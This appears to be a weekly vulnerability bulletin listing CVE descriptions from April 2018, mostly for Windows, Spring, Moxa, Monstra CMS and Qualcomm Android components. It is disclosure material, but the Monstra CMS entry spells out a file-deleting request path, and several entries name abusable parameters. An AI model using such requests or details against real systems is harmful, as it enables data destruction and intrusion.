An information disclosure vulnerability exists in the Windows kernel that could allow an attacker to retrieve information that could lead to a Kernel Address Space Layout Randomization (ASLR) bypass, aka "Windows Kernel Information Disclosure Vulnerability." This affects Windows 7, Windows Server 2012 R2, Windows RT 8.1, Windows Server 2008, Windows Server 2012, Windows 8.1, Windows Server 2016, Windows Server 2008 R2, Windows 10, Windows 10 Servers. This CVE ID is unique from CVE-2018-0887, CVE-2018-0960, CVE-2018-0968, CVE-2018-0969, CVE-2018-0970, CVE-2018-0971, CVE-2018-0972, CVE-2018-0973, CVE-2018-0975. 2018-04-11 not yet calculated CVE-2018-0974
BID
SECTRACK
CONFIRMmicrosoft -- windows_kernel
An information disclosure vulnerability exists in the Windows kernel that could allow an attacker to retrieve information that could lead to a Kernel Address Space Layout Randomization (ASLR) bypass, aka "Windows Kernel Information Disclosure Vulnerability." This affects Windows 7, Windows Server 2012 R2, Windows RT 8.1, Windows Server 2008, Windows Server 2012, Windows 8.1, Windows Server 2016, Windows Server 2008 R2, Windows 10, Windows 10 Servers. This CVE ID is unique from CVE-2018-0887, CVE-2018-0960, CVE-2018-0968, CVE-2018-0969, CVE-2018-0970, CVE-2018-0971, CVE-2018-0973, CVE-2018-0974, CVE-2018-0975. 2018-04-11 not yet calculated CVE-2018-0972
BID
SECTRACK
CONFIRMmicrosoft -- windows_kernel
An information disclosure vulnerability exists in the Windows kernel that could allow an attacker to retrieve information that could lead to a Kernel Address Space Layout Randomization (ASLR) bypass, aka "Windows Kernel Information Disclosure Vulnerability." This affects Windows 7, Windows Server 2012 R2, Windows RT 8.1, Windows Server 2008, Windows Server 2012, Windows 8.1, Windows Server 2016, Windows Server 2008 R2, Windows 10, Windows 10 Servers. This CVE ID is unique from CVE-2018-0887, CVE-2018-0960, CVE-2018-0968, CVE-2018-0969, CVE-2018-0970, CVE-2018-0971, CVE-2018-0972, CVE-2018-0973, CVE-2018-0974. 2018-04-11 not yet calculated CVE-2018-0975
BID
SECTRACK
CONFIRMmicrosoft -- windows
A denial of service vulnerability exists in the way that Windows SNMP Service handles malformed SNMP traps, aka "Windows SNMP Service Denial of Service Vulnerability." This affects Windows 7, Windows Server 2012 R2, Windows RT 8.1, Windows Server 2008, Windows Server 2012, Windows 8.1, Windows Server 2016, Windows Server 2008 R2, Windows 10, Windows 10 Servers. 2018-04-11 not yet calculated CVE-2018-0967
BID
SECTRACK
CONFIRMmicrosoft -- windows
A remote code execution vulnerability exists when the Windows font library improperly handles specially crafted embedded fonts, aka "Microsoft Graphics Remote Code Execution Vulnerability." This affects Windows 7, Windows Server 2012 R2, Windows RT 8.1, Windows Server 2008, Windows Server 2012, Windows 8.1, Windows Server 2016, Windows Server 2008 R2, Windows 10, Windows 10 Servers. This CVE ID is unique from CVE-2018-1010, CVE-2018-1012, CVE-2018-1013, CVE-2018-1015. 2018-04-11 not yet calculated CVE-2018-1016
BID
SECTRACK
CONFIRMmicrosoft -- windows
An elevation of privilege vulnerability exists when Windows improperly handles objects in memory and incorrectly maps kernel memory, aka "Microsoft DirectX Graphics Kernel Subsystem Elevation of Privilege Vulnerability." This affects Windows Server 2012 R2, Windows RT 8.1, Windows Server 2012, Windows Server 2016, Windows 8.1, Windows 10, Windows 10 Servers. 2018-04-11 not yet calculated CVE-2018-1009
BID
SECTRACK
CONFIRMmicrosoft -- windows
A remote code execution vulnerability exists when the Windows font library improperly handles specially crafted embedded fonts, aka "Microsoft Graphics Remote Code Execution Vulnerability." This affects Windows 7, Windows Server 2012 R2, Windows RT 8.1, Windows Server 2008, Windows Server 2012, Windows 8.1, Windows Server 2016, Windows Server 2008 R2, Windows 10, Windows 10 Servers. This CVE ID is unique from CVE-2018-1010, CVE-2018-1012, CVE-2018-1015, CVE-2018-1016. 2018-04-11 not yet calculated CVE-2018-1013
BID
SECTRACK
CONFIRMmicrosoft -- windows
An information disclosure vulnerability exists when Windows Hyper-V on a host operating system fails to properly validate input from an authenticated user on a guest operating system, aka "Hyper-V Information Disclosure Vulnerability." This affects Windows Server 2012 R2, Windows RT 8.1, Windows Server 2016, Windows 8.1, Windows 10, Windows 10 Servers. This CVE ID is unique from CVE-2018-0964. 2018-04-11 not yet calculated CVE-2018-0957
BID
SECTRACK
CONFIRMmicrosoft -- windows
A remote code execution vulnerability exists when the Windows font library improperly handles specially crafted embedded fonts, aka "Microsoft Graphics Remote Code Execution Vulnerability." This affects Windows 7, Windows Server 2012 R2, Windows RT 8.1, Windows Server 2008, Windows Server 2012, Windows 8.1, Windows Server 2016, Windows Server 2008 R2, Windows 10, Windows 10 Servers. This CVE ID is unique from CVE-2018-1012, CVE-2018-1013, CVE-2018-1015, CVE-2018-1016. 2018-04-11 not yet calculated CVE-2018-1010
BID
SECTRACK
CONFIRMmicrosoft -- windows
A remote code execution vulnerability exists when the Windows font library improperly handles specially crafted embedded fonts, aka "Microsoft Graphics Remote Code Execution Vulnerability." This affects Windows 7, Windows Server 2012 R2, Windows RT 8.1, Windows Server 2008, Windows Server 2012, Windows 8.1, Windows Server 2016, Windows Server 2008 R2, Windows 10, Windows 10 Servers. This CVE ID is unique from CVE-2018-1010, CVE-2018-1013, CVE-2018-1015, CVE-2018-1016. 2018-04-11 not yet calculated CVE-2018-1012
BID
SECTRACK
CONFIRMmicrosoft -- windows
A remote code execution vulnerability exists when the Windows font library improperly handles specially crafted embedded fonts, aka "Microsoft Graphics Remote Code Execution Vulnerability." This affects Windows 7, Windows Server 2012 R2, Windows RT 8.1, Windows Server 2008, Windows Server 2012, Windows 8.1, Windows Server 2016, Windows Server 2008 R2, Windows 10, Windows 10 Servers. This CVE ID is unique from CVE-2018-1010, CVE-2018-1012, CVE-2018-1013, CVE-2018-1016. 2018-04-11 not yet calculated CVE-2018-1015
BID
SECTRACK
CONFIRMmicrosoft -- windows
A security feature bypass vulnerability exists when Active Directory incorrectly applies Network Isolation settings, aka "Active Directory Security Feature Bypass Vulnerability." This affects Windows Server 2016, Windows 10, Windows 10 Servers. 2018-04-11 not yet calculated CVE-2018-0890
BID
SECTRACK
CONFIRMmicrosoft -- windows
A denial of service vulnerability exists in Remote Desktop Protocol (RDP) when an attacker connects to the target system using RDP and sends specially crafted requests, aka "Windows Remote Desktop Protocol (RDP) Denial of Service Vulnerability." This affects Windows 7, Windows Server 2012 R2, Windows RT 8.1, Windows Server 2008, Windows Server 2012, Windows 8.1, Windows Server 2016, Windows Server 2008 R2, Windows 10, Windows 10 Servers. 2018-04-11 not yet calculated CVE-2018-0976
BID
SECTRACK
CONFIRMmicrosoft -- windows
A buffer overflow vulnerability exists in the Microsoft JET Database Engine that could allow remote code execution on an affected system, aka "Microsoft JET Database Engine Remote Code Execution Vulnerability." This affects Windows 7, Windows Server 2012 R2, Windows RT 8.1, Windows Server 2008, Windows Server 2012, Windows 8.1, Windows Server 2016, Windows Server 2008 R2, Windows 10. 2018-04-11 not yet calculated CVE-2018-1003
BID
SECTRACK
CONFIRMmicrosoft -- windows
A denial of service vulnerability exists in the way that Windows handles objects in memory, aka "Microsoft Graphics Component Denial of Service Vulnerability." This affects Windows 7, Windows Server 2012 R2, Windows RT 8.1, Windows Server 2008, Windows Server 2012, Windows 8.1, Windows Server 2016, Windows Server 2008 R2, Windows 10, Windows 10 Servers. 2018-04-11 not yet calculated CVE-2018-8116
BID
SECTRACK
CONFIRMmicrosoft -- windows
A security feature bypass exists when Device Guard incorrectly validates an untrusted file, aka "Device Guard Security Feature Bypass Vulnerability." This affects Windows Server 2016, Windows 10, Windows 10 Servers. 2018-04-11 not yet calculated CVE-2018-0966
BID
SECTRACK
CONFIRMmicrosoft -- windows
A denial of service vulnerability exists in the HTTP 2.0 protocol stack (HTTP.sys) when HTTP.sys improperly parses specially crafted HTTP 2.0 requests, aka "HTTP.sys Denial of Service Vulnerability." This affects Windows Server 2016, Windows 10, Windows 10 Servers. 2018-04-11 not yet calculated CVE-2018-0956
BID
SECTRACK
CONFIRMmicrosoft -- windows
An elevation of privilege vulnerability exists in Windows Adobe Type Manager Font Driver (ATMFD.dll) when it fails to properly handle objects in memory, aka "OpenType Font Driver Elevation of Privilege Vulnerability." This affects Windows 7, Windows Server 2012 R2, Windows RT 8.1, Windows Server 2008, Windows Server 2012, Windows 8.1, Windows Server 2016, Windows Server 2008 R2, Windows 10, Windows 10 Servers. 2018-04-11 not yet calculated CVE-2018-1008
BID
SECTRACK
CONFIRMmicrosoft -- windows
An information disclosure vulnerability exists when Windows Hyper-V on a host operating system fails to properly validate input from an authenticated user on a guest operating system, aka "Hyper-V Information Disclosure Vulnerability." This affects Windows 10, Windows 10 Servers. This CVE ID is unique from CVE-2018-0957. 2018-04-11 not yet calculated CVE-2018-0964
BID
SECTRACK
CONFIRMmicrosoft -- wireless_keyboard_850
A security feature bypass vulnerability exists in the Microsoft Wireless Keyboard 850 which could allow an attacker to reuse an AES encryption key to send keystrokes to other keyboard devices or to read keystrokes sent by other keyboards for the affected devices, aka "Microsoft Wireless Keyboard 850 Security Feature Bypass Vulnerability." This affects Microsoft Wireless Keyboard 850. 2018-04-11 not yet calculated CVE-2018-8117
BID
CONFIRMmicrosoft -- word_and_office
An information disclosure vulnerability exists when Office renders Rich Text Format (RTF) email messages containing OLE objects when a message is opened or previewed, aka "Microsoft Office Information Disclosure Vulnerability." This affects Microsoft Word, Microsoft Office. This CVE ID is unique from CVE-2018-1007. 2018-04-11 not yet calculated CVE-2018-0950
BID
SECTRACK
CONFIRMmikrotik -- routeros
An issue was discovered in MikroTik RouterOS 6.41.4. Missing OpenVPN server certificate verification allows a remote unauthenticated attacker capable of intercepting client traffic to act as a malicious OpenVPN server. This may allow the attacker to gain access to the client's internal network (for example, at site-to-site tunnels). 2018-04-13 not yet calculated CVE-2018-10066
MISCmonstra_cms -- monstra_cms
Monstra CMS 3.0.4 allows remote code execution via an upload_file request for a .zip file, which is automatically extracted and may contain .php files. 2018-04-10 not yet calculated CVE-2018-9037
MISCmonstra_cms -- monstra_cms
Monstra CMS 3.0.4 allows remote attackers to delete files via an admin/index.php?id=filesmanager&delete_dir=./&path=uploads/ request. 2018-04-10 not yet calculated CVE-2018-9038
MISCmoxa -- awk-3131a
An exploitable OS Command Injection vulnerability exists in the Telnet, SSH, and console login functionality of Moxa AWK-3131A Industrial IEEE 802.11a/b/g/n wireless AP/bridge/client in firmware versions 1.4 to 1.7 (current). An attacker can inject commands via the username parameter of several services (SSH, Telnet, console), resulting in remote, unauthenticated, root-level operating system command execution. 2018-04-11 not yet calculated CVE-2017-14459
MISCmoxa -- mxview
The private key of the web server in Moxa MXview versions 2.8 and prior is able to be read and accessed via an HTTP GET request, which may allow a remote attacker to decrypt encrypted information. 2018-04-06 not yet calculated CVE-2018-7506
BID
MISCnetwide_assembler -- netwide_assembler
Netwide Assembler (NASM) 2.14rc0 has a division-by-zero vulnerability in the expr5 function in asm/eval.c via a malformed input file. 2018-04-11 not yet calculated CVE-2018-10016
MISConethink -- onethink
SSRF (Server Side Request Forgery) in getRemoteImage.php in Ueditor in Onethink V1.0 and V1.1 allows remote attackers to obtain sensitive information, attack intranet hosts, or possibly trigger remote command execution via the upfile parameter. 2018-04-10 not yet calculated CVE-2017-14323
FULLDISCopen-xchange -- appsuite
The backend in Open-Xchange (OX) AppSuite 7.4.2 before 7.4.2-rev9 allows remote attackers to obtain sensitive information about user email addresses in opportunistic circumstances by leveraging a failure in e-mail auto configuration for external accounts. 2018-04-10 not yet calculated CVE-2014-2078
BUGTRAQ
XFopen_web_analytics -- open_web_analytics
Open Web Analytics (OWA) before 1.5.7 allows remote attackers to conduct PHP object injection attacks via a crafted serialized object in the owa_event parameter to queue.php. 2018-04-10 not yet calculated CVE-2014-0158
MISC
CONFIRM
BID
MISC
MISCopen_whisper_system -- signal
The Open Whisper Signal app before 2.23.2 for iOS allows physically proximate attackers to bypass the screen locker feature via certain rapid sequences of actions that include app opening, clicking on cancel, and using the home button. 2018-04-10 not yet calculated CVE-2018-9840
MISC
MISC
MISCopendocman -- opendocman
OpenDocMan 1.2.7 and earlier does not properly validate allowed actions, which allows remote authenticated users to bypass an intended access restrictions and assign administrative privileges to themselves via a crafted request to signup.php. 2018-04-10 not yet calculated CVE-2014-1946
BUGTRAQ
XF
MISCopenmpt -- openmpt
soundlib/Snd_fx.cpp in OpenMPT before 1.27.07.00 and libopenmpt before 0.3.8 allows remote attackers to cause a denial of service (out-of-bounds read) via an IT or MO3 file with many nested pattern loops. 2018-04-11 not yet calculated CVE-2018-10017
CONFIRM
CONFIRM
CONFIRMopenshift -- openshift_enterprise
OpenShift Enterprise version 3.x is vulnerable to a stored XSS via the log viewer for pods. The flaw is due to lack of sanitation of user input, specifically terminal escape characters, and the creation of clickable links automatically when viewing the log files for a pod. 2018-04-11 not yet calculated CVE-2017-7534
CONFIRMopentext -- documentum_d2_webtop
In OpenText Documentum D2 Webtop v4.6.0030 build 059, a Reflected Cross-Site Scripting Vulnerability could potentially be exploited by malicious users to compromise the affected system via the servlet/Download _docbase or _username parameter. 2018-04-11 not yet calculated CVE-2018-7660
MISCopentext -- documentum_d2_webtop
In OpenText Documentum D2 Webtop v4.6.0030 build 059, a Stored Cross-Site Scripting Vulnerability could potentially be exploited by malicious users to compromise the affected system via a filename of an uploaded image file. 2018-04-11 not yet calculated CVE-2018-7659
MISCopmantek -- open-audit_professional
Cross-site scripting (XSS) vulnerability in Open-AudIT Professional 2.1.1 allows remote attackers to inject arbitrary web script or HTML via a crafted name of a component, as demonstrated by the Admin->Logs section (with a logs?logs.type= URI) and the Manage->Attributes section (via the "Name (display)" field to the attributes/create URI). 2018-04-12 not yet calculated CVE-2018-9155
MISCpcs -- pcs
pcs before versions 0.9.164 and 0.10 is vulnerable to a debug parameter removal bypass. REST interface of the pcsd service did not properly remove the pcs debug argument from the /run_pcs query, possibly disclosing sensitive information. A remote attacker with a valid token could use this flaw to elevate their privilege. 2018-04-12 not yet calculated CVE-2018-1086
REDHAT
MISC
DEBIANpcs -- pcs
pcs before version 0.9.164 and 0.10 is vulnerable to a privilege escalation via authorized user malicious REST call. The REST interface of the pcsd service did not properly sanitize the file name from the /remote/put_file query. If the /etc/booth directory exists, an authenticated attacker with write permissions could create or overwrite arbitrary files with arbitrary data outside of the /etc/booth directory, in the context of the pcsd process. 2018-04-12 not yet calculated CVE-2018-1079
MISC
MISCphpscriptsmall.com -- car_rental_script
PHP Scripts Mall Car Rental Script 2.0.8 has XSS via the User Name field in an Edit Profile action. 2018-04-12 not yet calculated CVE-2018-6904
MISCphpscriptsmall.com -- hot_scripts_clone_script_classified
PHP Scripts Mall Hot Scripts Clone Script Classified v3.1 uses the client side to enforce validation of an e-mail address, which allows remote attackers to modify a registered e-mail address by removing the validation code. 2018-04-12 not yet calculated CVE-2018-6903
MISCphpscriptsmall.com -- image_sharing_script
PHP Scripts Mall Image Sharing Script 1.3.3 has XSS via the Full Name field in an Edit Profile action. 2018-04-12 not yet calculated CVE-2018-6902
MISCphpscriptsmall.com -- match_clone_script
PHP Scripts Mall Match Clone Script 1.0.4 has XSS via the search field to searchbyid.php (aka the "View Search By Id" screen). 2018-04-09 not yet calculated CVE-2018-9857
MISCphpscriptsmall.com -- online_tutoring_script
CSRF exists in student/personal-info in PHP Scripts Mall Online Tutoring Script 2.0.3. 2018-04-12 not yet calculated CVE-2018-6934
MISCphpscriptsmall.com -- student_profile_management_system_script
PHP Scripts Mall Student Profile Management System Script v2.0.6 has XSS via the Name field to list_student.php. 2018-04-12 not yet calculated CVE-2018-6935
MISCphpscriptsmall.com -- website_broker_script
PHP Scripts Mall Website Broker Script 3.0.6 has XSS via the Last Name field on the My Profile page. 2018-04-12 not yet calculated CVE-2018-6900
MISCphpscriptsmall.com -- website_seller_script
Reflected XSS exists in PHP Scripts Mall Website Seller Script 2.0.3 via the Listings Search feature. 2018-04-12 not yet calculated CVE-2018-6870
MISCphpscriptsmall.com -- website_seller_script
PHP Scripts Mall Website Seller Script 2.0.3 uses the client side to enforce validation of an e-mail address, which allows remote attackers to modify a registered e-mail address by removing the validation code. 2018-04-12 not yet calculated CVE-2018-6879
MISCpivotal -- spring_data_commons
Spring Data Commons, versions prior to 1.13 to 1.13.10, 2.0 to 2.0.5, and older unsupported versions, contain a property binder vulnerability caused by improper neutralization of special elements. An unauthenticated remote malicious user (or attacker) can supply specially crafted request parameters against Spring Data REST backed HTTP resources or using Spring Data's projection-based request payload binding hat can lead to a remote code execution attack. 2018-04-11 not yet calculated CVE-2018-1273
CONFIRMpivotal -- spring_framework
Spring Framework, versions 5.0 prior to 5.0.5 and versions 4.3 prior to 4.3.15 and older unsupported versions, allow applications to configure Spring MVC to serve static resources (e.g. CSS, JS, images). When static resources are served from a file system on Windows (as opposed to the classpath, or the ServletContext), a malicious user can send a request using a specially crafted URL that can lead a directory traversal attack. 2018-04-06 not yet calculated CVE-2018-1271
BID
CONFIRMpivotal -- spring_framework
Spring Framework, versions 5.0 prior to 5.0.5 and versions 4.3 prior to 4.3.15 and older unsupported versions, provide client-side support for multipart requests. When Spring MVC or Spring WebFlux server application (server A) receives input from a remote client, and then uses that input to make a multipart request to another server (server B), it can be exposed to an attack, where an extra multipart is inserted in the content of the request from server A, causing server B to use the wrong value for a part it expects. This could to lead privilege escalation, for example, if the part content represents a username or user roles. 2018-04-06 not yet calculated CVE-2018-1272
BID
CONFIRMpivotal -- spring_framework
Spring Framework, versions 5.0 prior to 5.0.5 and versions 4.3 prior to 4.3.16 and older unsupported versions, allow applications to expose STOMP over WebSocket endpoints with a simple, in-memory STOMP broker through the spring-messaging module. A malicious user (or attacker) can craft a message to the broker that can lead to a remote code execution attack. This CVE addresses the partial fix for CVE-2018-1270 in the 4.3.x branch of the Spring Framework. 2018-04-11 not yet calculated CVE-2018-1275
CONFIRMpivotal -- spring_framework
Spring Framework, versions 5.0 prior to 5.0.5 and versions 4.3 prior to 4.3.15 and older unsupported versions, allow applications to expose STOMP over WebSocket endpoints with a simple, in-memory STOMP broker through the spring-messaging module. A malicious user (or attacker) can craft a message to the broker that can lead to a remote code execution attack. 2018-04-06 not yet calculated CVE-2018-1270
BID
CONFIRMplays.tv -- plays.tv
plays_service.exe in the plays.tv service before 1.27.7.0, as distributed in AMD driver-installation packages and Gaming Evolved products, executes code at a user-defined (local or SMB) path as SYSTEM when the execute_installer parameter is used in an HTTP message. This occurs without properly authenticating the user. 2018-04-13 not yet calculated CVE-2018-6546
MISC
MISCplays.tv -- plays.tv
plays_service.exe in the plays.tv service before 1.27.7.0, as distributed in AMD driver-installation packages and Gaming Evolved products, contains an HTTP message parsing function that takes a user-defined path and writes non-user controlled data as SYSTEM to the file when the extract_files parameter is used. This occurs without properly authenticating the user. 2018-04-13 not yet calculated CVE-2018-6547
MISCqpdf -- qpdf
libqpdf.a in QPDF through 8.0.2 mishandles certain "expected dictionary key but found non-name object" cases, allowing remote attackers to cause a denial of service (stack exhaustion), related to the QPDFObjectHandle and QPDF_Dictionary classes, because nesting in direct objects is not restricted. 2018-04-10 not yet calculated CVE-2018-9918
MISC
MISCqualcomm -- android In Android before security patch level 2018-04-05 on Qualcomm Snapdragon Mobile and Snapdragon Wear MDM9206, MDM9607, MDM9650, SD 210/SD 212/SD 205, SD 835, an out of bound access for ebi channel array can potentially occur. 2018-04-11 not yet calculated CVE-2017-18133
BID
CONFIRMqualcomm -- android
In Android before security patch level 2018-04-05 on Qualcomm Snapdragon Automobile, Snapdragon Mobile, and Snapdragon Wear MDM9206, MDM9607, MDM9650, MSM8909W, SD 210/SD 212/SD 205, SD 400, SD 410/12, SD 425, SD 430, SD 450, SD 615/16/SD 415, SD 617, SD 625, SD 650/52, SD 800, SD 808, SD 810, SD 820, SD 820A, SD 835, SD 845, SD 850, in some corner cases, ECDSA signature verification can fail. 2018-04-11 not yet calculated CVE-2017-18146
BID
CONFIRMqualcomm -- android
In Android before security patch level 2018-04-05 on Qualcomm Snapdragon Mobile MDM9650, MDM9655, SD 835, SD 845, SD 850, the vswr capture size is larger than the maximum size of a diag logPacket, which can lead to a buffer overflow when the sample buffer is copied to the logPacket buffer. 2018-04-11 not yet calculated CVE-2018-3589
BID
CONFIRMqualcomm -- android
In Android before security patch level 2018-04-05 on Qualcomm Snapdragon Automobile, Snapdragon Mobile, and Snapdragon Wear MDM9206, MDM9607, MDM9650, MSM8909W, SD 210/SD 212/SD 205, SD 400, SD 425, SD 430, SD 450, SD 615/16/SD 415, SD 617, SD 625, SD 650/52, SD 808, SD 810, SD 820, SD 820A, SD 835, SD 845, repeated enable/disable eMBMS requests may result in a double free condition. 2018-04-11 not yet calculated CVE-2018-3593
BID
CONFIRMqualcomm -- android
In Android before security patch level 2018-04-05 on Qualcomm Snapdragon Mobile and Snapdragon Wear MDM9607, MDM9625, MDM9635M, MDM9640, MDM9645, MDM9650, MDM9655, MSM8909W, SD 210/SD 212/SD 205, SD 400, SD 410/12, SD 425, SD 430, SD 615/16/SD 415, SD 800, SD 808, SD 810, SD 820, SD 835, while playing a .wma file with modified media header with non-standard bytes per second parameter value, a reachable assert occurs. 2018-04-11 not yet calculated CVE-2017-18074
BID
CONFIRMqualcomm -- android
In Android before security patch level 2018-04-05 on Qualcomm Snapdragon Mobile and Snapdragon Wear MDM9206, MDM9607, MDM9640, MDM9650, QCA4531, QCA6174A, QCA6564, QCA6574, QCA6574AU, QCA6584, QCA6584AU, QCA9377, QCA9378, QCA9379, SD 210/SD 212/SD 205, SD 410/12, SD 425, SD 427, SD 430, SD 435, SD 450, SD 615/16/SD 415, SD 625, SD 650/52, SD 808, SD 810, SD 820, SD 835, SD 845, SDM630, SDM636, SDM660, Snapdragon_High_Med_2016, the probe requests originated from user's phone contains the information elements which specifies the supported wifi features. This shall impact the user's privacy if someone sniffs the probe requests originated by this DUT. Hence, control the presence of which information elements is supported. 2018-04-11 not yet calculated CVE-2017-18072
BID
CONFIRMqualcomm -- android
In Android before security patch level 2018-04-05 on Qualcomm Snapdragon Mobile SD 845, SD 850, improper access control while configuring MPU protecting error correction registers may potentially lead to exposure of related secured data. 2018-04-11 not yet calculated CVE-2017-18128
BID
CONFIRMqualcomm -- android
In Android before security patch level 2018-04-05 on Qualcomm Snapdragon Mobile and Snapdragon Wear MSM8909W, SD 210/SD 212/SD 205, SD 450, SD 615/16/SD 415, SD 625, SD 650/52, SD 820, SD 835, SD 845, while the DPM native process is processing framework events, the iterator pointer is deleted after processing an event. When processing subsequent events, a Use After Condition will occur. 2018-04-11 not yet calculated CVE-2017-18145
BID
CONFIRMqualcomm -- android
In Android before security patch level 2018-04-05 on Qualcomm Snapdragon Mobile MDM9650, MDM9655, SD 835, SD 845, SD 850, while processing the IMS SIP username, a buffer overflow can occur. 2018-04-11 not yet calculated CVE-2017-18142
BID
CONFIRMqualcomm -- android
In Android before security patch level 2018-04-05 on Qualcomm Snapdragon Mobile SD 845, SD 850, on a secure device, PD dumps are collected when debugging is not enabled. 2018-04-11 not yet calculated CVE-2017-18143
BID
CONFIRMqualcomm -- android
In Android before security patch level 2018-04-05 on Qualcomm Snapdragon Mobile and Snapdragon Wear MSM8909W, SD 210/SD 212/SD 205, SD 430, SD 450, SD 625, SD 650/52, SD 820, SD 835, SD 845, while processing a SetParam command packet in the VR service, the extracted name_len and value_len values are not checked and could potentially cause a buffer overflow in subsequent calls to memcpy(). 2018-04-11 not yet calculated CVE-2017-18127
BID
CONFIRMqualcomm -- android
In Android before security patch level 2018-04-05 on Qualcomm Snapdragon Mobile and Snapdragon Wear MDM9206, MDM9607, MDM9640, MDM9650, QCA6174A, QCA6574, QCA6574AU, QCA6584, QCA6584AU, QCA9377, QCA9379, SD 210/SD 212/SD 205, SD 410/12, SD 425, SD 427, SD 430, SD 435, SD 450, SD 615/16/SD 415, SD 625, SD 650/52, SD 808, SD 810, SD 820, SD 835, SD 845, SDM630, SDM636, SDM660, Snapdragon_High_Med_2016, the original mac spoofing feature does not use the following in probe request frames: (a) randomized sequence numbers and (b) randomized source address for cfg80211 scan, vendor scan and pno scan which may affect user privacy. 2018-04-11 not yet calculated CVE-2017-18126
BID
CONFIRMqualcomm -- android
In Android before security patch level 2018-04-05 on Qualcomm Snapdragon Automobile, Snapdragon Mobile, and Snapdragon Wear MDM9206, MDM9607, MDM9650, SD 210/SD 212/SD 205, SD 820, SD 820A, SD 835, the HLOS can gain access to unauthorized memory. 2018-04-11 not yet calculated CVE-2017-18073
BID
CONFIRMqualcomm -- android
In Android before security patch level 2018-04-05 on Qualcomm Snapdragon Mobile and Snapdragon Wear MDM9206, MDM9607, SD 210/SD 212/SD 205, SD 425, SD 430, SD 450, SD 625, SD 820, SD 835, a Use After Free condition can occur in a communication API. 2018-04-11 not yet calculated CVE-2017-11011
BID
CONFIRMqualcomm -- android
In Android before security patch level 2018-04-05 on Qualcomm Snapdragon Automobile, Snapdragon Mobile, and Snapdragon Wear MDM9206, MDM9607, MDM9650, SD 210/SD 212/SD 205, SD 425, SD 430, SD 450, SD 615/16/SD 415, SD 617, SD 625, SD 650/52, SD 808, SD 820, SD 820A, SD 835, SD 845, while parsing a private frame in an ID3 tag, a buffer over-read can occur when comparing frame data with predefined owner identifier strings. 2018-04-11 not yet calculated CVE-2018-3594
BID
CONFIRMqualcomm -- android
In Android before security patch level 2018-04-05 on Qualcomm Snapdragon Mobile SD 210/SD 212/SD 205, SD 400, SD 430, SD 450, SD 617, SD 625, SD 650/52, SD 800, SD 808, SD 820, SD 835, an integer overflow vulnerability exists in a video library. 2018-04-11 not yet calculated CVE-2017-8275
BID
CONFIRMqualcomm -- android
In Android before security patch level 2018-04-05 on Qualcomm Snapdragon Mobile and Snapdragon Wear MSM8909W, SD 210/SD 212/SD 205, SD 450, SD 615/16/SD 415, SD 625, SD 650/52, SD 820, SD 835, SD 845, while processing the retransmission of WPA supplicant command send failures, there is a make after break of the connection to WPA supplicant where the local pointer is not properly updated. If the WPA supplicant command transmission fails, a Use After Free condition will occur. 2018-04-11 not yet calculated CVE-2017-18144
BID
CONFIRMqualcomm -- android
In Android before security patch level 2018-04-05 on Qualcomm Snapdragon Mobile SD 845, SD 850, a buffer overflow may potentially occur while processing a response from the SIM card. 2018-04-11 not yet calculated CVE-2017-18134
BID
CONFIRMqualcomm -- android
In Android before security patch level 2018-04-05 on Qualcomm Snapdragon Automobile, Snapdragon Mobile, and Snapdragon Wear MDM9206, MDM9607, MDM9615, MDM9635M, MDM9640, MDM9650, MSM8909W, SD 210/SD 212/SD 205, SD 400, SD 425, SD 430, SD 450, SD 615/16/SD 415, SD 617, SD 625, SD 650/52, SD 808, SD 820, SD 820A, SD 835, SD 845, in the omx aac component, a Use After Free condition may potentially occur. 2018-04-11 not yet calculated CVE-2017-18136
BID
CONFIRMqualcomm -- android
In Android before security patch level 2018-04-05 on Qualcomm Snapdragon Mobile and Snapdragon Wear MDM9206, MDM9607, MDM9635M, MDM9640, MDM9645, MDM9650, MDM9655, MSM8909W, SD 210/SD 212/SD 205, SD 400, SD 410/12, SD 425, SD 430, SD 450, SD 615/16/SD 415, SD 617, SD 625, SD 650/52, SD 808, SD 810, SD 820, SD 835, SD 845, SD 850, a buffer overflow vulnerability may potentially exist while making an IMS call. 2018-04-11 not yet calculated CVE-2017-18139
BID
CONFIRMqualcomm -- android
In Android before security patch level 2018-04-05 on Qualcomm Snapdragon Mobile and Snapdragon Wear MDM9206, MDM9607, MDM9635M, MDM9640, MDM9645, MDM9650, MDM9655, MSM8909W, SD 210/SD 212/SD 205, SD 425, SD 430, SD 450, SD 625, SD 650/52, SD 820, SD 835, SD 845, SD 850, added a change to check if the pointer has been reset to NULL or not, before writing to the memory pointed by the pointer. 2018-04-11 not yet calculated CVE-2018-3592
BID
CONFIRMqualcomm -- android
In Android before security patch level 2018-04-05 on Qualcomm Snapdragon Mobile and Snapdragon Wear MDM9206, MDM9607, MDM9635M, MDM9640, MDM9645, MDM9650, MDM9655, MSM8909W, SD 210/SD 212/SD 205, SD 400, SD 410/12, SD 425, SD 430, SD 450, SD 615/16/SD 415, SD 617, SD 625, SD 650/52, SD 808, SD 810, SD 820, SD 835, SD 845, SD 850, in GERAN, a buffer overflow may potentially occur. 2018-04-11 not yet calculated CVE-2017-18138
BID
CONFIRMqualcomm -- android
In Android before security patch level 2018-04-05 on Qualcomm Snapdragon Mobile and Snapdragon Wear MDM9206, MDM9607, MSM8909W, SD 210/SD 212/SD 205, SD 425, SD 430, SD 450, SD 625, SD 650/52, an access control vulnerability exists in Core. 2018-04-11 not yet calculated CVE-2017-8274
BID
CONFIRMqualcomm -- android
In Android before security patch level 2018-04-05 on Qualcomm Snapdragon Automobile and Snapdragon Mobile MDM9206, MDM9607, SD 845, MSM8996, MSM8998, it is possible for IPA (internet protocol accelerator) channels owned by one security domain to be controlled from other domains. 2018-04-11 not yet calculated CVE-2017-18129
BID
CONFIRMqualcomm -- android
In Android before security patch level 2018-04-05 on Qualcomm Snapdragon Mobile MDM9650, MDM9655, SD 450, SD 625, SD 650/52, SD 835, SD 845, SD 850, in the Wireless Data Service (WDS) module, a buffer overflow can occur. 2018-04-11 not yet calculated CVE-2017-18135
BID
CONFIRMqualcomm -- android
In Android before security patch level 2018-04-05 on Qualcomm Snapdragon Mobile and Snapdragon Wear MDM9206, MDM9607, MDM9650, SD 210/SD 212/SD 205, SD 835, SD 845, SD 850, when secure camera is activated it stores captured data in protected buffers. The TEE application which uses secure camera expects those buffers to contain data captured during the current camera session. It is possible though for HLOS to put aside and reuse one or more of the protected buffers with previously captured data during next camera session. Such data reuse must be prevented as the TEE applications expects to receive valid data captured during the current session only. 2018-04-11 not yet calculated CVE-2017-18125
BID
CONFIRMqualcomm -- android
